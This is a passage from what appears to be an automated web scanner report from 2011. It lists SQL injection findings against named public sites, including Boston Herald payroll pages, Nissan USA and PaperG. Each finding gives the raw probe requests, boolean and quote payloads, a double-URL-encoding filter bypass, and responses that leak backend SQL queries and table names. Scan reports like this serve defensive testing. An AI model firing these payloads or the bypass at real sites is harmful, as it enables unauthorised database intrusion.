Server: hi
Status: 200 OK
X-Transaction: 1296234419-42681-53710
ETag: "f792bef31a7a2a529a063813c45d5cab"
Last-Modified: Fri, 28 Jan 2011 17:06:59 GMT
X-Runtime: 0.05064
Content-Type: text/html; charset=utf-8
Content-Length: 45230
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<div class="hc-tweet-text">says when you give your permission to succeed, you can deny that you gave yourself that permission later when you fail.</div>
...[SNIP]...

Request 2

GET /?status=@ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa''; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response 2

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:07:00 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234420-50746-44456
ETag: "8e7d3220e37789a7d94eb127863bf8c4"
Last-Modified: Fri, 28 Jan 2011 17:07:00 GMT
X-Runtime: 0.04397
Content-Type: text/html; charset=utf-8
Content-Length: 45014
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...

1.32. http://www.bostonherald.com/projects/payroll/cambridge/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/cambridge/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/cambridge/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:47:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 451
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.*,j.full FROM `cambridgeData` a INNER JOIN `cambridgeCats` j ON j.cat_id = department_id WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

1.33. http://www.bostonherald.com/projects/payroll/mass_pike/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/mass_pike/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/mass_pike/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:29:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 319
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT * FROM `massPikePayroll` WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

1.34. http://www.bostonherald.com/projects/payroll/quasi_state/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/quasi_state/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/quasi_state/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:39:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 492
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.*, b.agency FROM `quasi_state_data` a INNER JOIN `quasi_state_agencies` b ON a.quasi_state_agency_id = b.id WHERE 1=1 ORDER BY ?1\'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1\'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

1.35. http://www.bostonherald.com/projects/payroll/quincy/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/quincy/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/quincy/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:36:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 317
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `quincyData` a WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

1.36. http://www.bostonherald.com/projects/payroll/suffolk/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/suffolk/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/suffolk/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 319
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `suffolkData` a WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

1.37. http://www.bostonherald.com/projects/payroll/worcester/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/worcester/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/worcester/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:42:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 323
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `worcesterData` a WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

1.38. http://www.dominionenterprises.com/main/do/Terms_of_Use [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dominionenterprises.com
Path:   /main/do/Terms_of_Use

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /main/do'%20and%201%3d1--%20/Terms_of_Use HTTP/1.1
Host: www.dominionenterprises.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 18:06:02 GMT
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=be366704e38672859a8db520782f792d; expires=Sun, 30 Jan 2011 18:06:02 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 18:06:02 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Connection: close
Content-Type: text/html
Set-Cookie: TSa27990=ca07e63a6f9fbb179ce5ad4d3c3e1878d10fbf26f7d312e64d42fc7d9c5eca85e9f8e0cb; Path=/
Content-Length: 32742

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Home</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Home">
   <meta name="keywords" content="Home">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">

<script language="javascript" type="text/javascript">
var IsIPad = false;
function QueryStringIsRequestFromMobile(DirectToFullSite) {
Queries = window.location.search.substring(1);
if (Queries == "" || Queries == null) {
return false;
}
else {
QueryArray = Queries.split("&");
for (i = 0; i < QueryArray.length; i++) {
QueryValue = QueryArray[i].split("=");
if (QueryValue[0] == DirectToFullSite) {
if (QueryValue[1] == "fs24lmj09")
return true;
else
return fa
...[SNIP]...

Request 2

GET /main/do'%20and%201%3d2--%20/Terms_of_Use HTTP/1.1
Host: www.dominionenterprises.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 18:06:02 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=db04ccde3cb4cfceafb82443534877bd; expires=Sun, 30 Jan 2011 18:06:02 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 18:06:02 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Connection: close
Content-Type: text/html
Content-Length: 32742

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Home</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Home">
   <meta name="keywords" content="Home">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">

<script language="javascript" type="text/javascript">
var IsIPad = false;
function QueryStringIsRequestFromMobile(DirectToFullSite) {
Queries = window.location.search.substring(1);
if (Queries == "" || Queries == null) {
return false;
}
else {
QueryArray = Queries.split("&");
for (i = 0; i < QueryArray.length; i++) {
QueryValue = QueryArray[i].split("=");
if (QueryValue[0] == DirectToFullSite) {
if (QueryValue[1] == "fs24lmj09")
return true;
else
return false;
}
else

...[SNIP]...

1.39. http://www.nissanusa.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.nissanusa.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /?1%2527=1 HTTP/1.1
Host: www.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.11 (Unix) Communique/4.0.4 mod_ssl/2.2.11 OpenSSL/0.9.7d
Content-Type: text/html;charset=UTF-8
Date: Sat, 29 Jan 2011 04:37:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 66631

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>


<head>

<meta http-equiv="Content-type" content="text/html; charset=UTF-8" />
<t
...[SNIP]...
<span>See How They Stack Up</span>
...[SNIP]...

Request 2

GET /?1%2527%2527=1 HTTP/1.1
Host: www.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.11 (Unix) Communique/4.0.4 mod_ssl/2.2.11 OpenSSL/0.9.7d
Content-Type: text/html;charset=UTF-8
Date: Sat, 29 Jan 2011 04:37:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 66631

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>


<head>

<meta http-equiv="Content-type" content="text/html; charset=UTF-8" />
<t
...[SNIP]...

1.40. http://www.paperg.com/flyerboard/soundings-publications-llc/2123/0.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/soundings-publications-llc/2123/0.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 70060861%20or%201%3d1--%20 and 70060861%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/soundings-publications-llc/212370060861%20or%201%3d1--%20/0.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;

Response 1

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:17:50 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3370
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Flyerboard - NY Daily News" />
   
   <meta name="description" content = "NY Daily News NY Daily News Flyerboard, a community bulletin board." />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/4/logo.gif" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }
   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
       </div>        
       <!-- END: HEADER -->
       
        <!-- START: SET 1 -->
    <div id="set1">
       NY Daily News Flyerboard     </div>
    <!-- END: SET 1 -->

           <!-- START: CONTENT -->
           <div id="content">

               

               <div style="text-align: center; margin: 10px;">
                   
       
                   
            <s
...[SNIP]...

Request 2

GET /flyerboard/soundings-publications-llc/212370060861%20or%201%3d2--%20/0.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;

Response 2

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:17:51 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
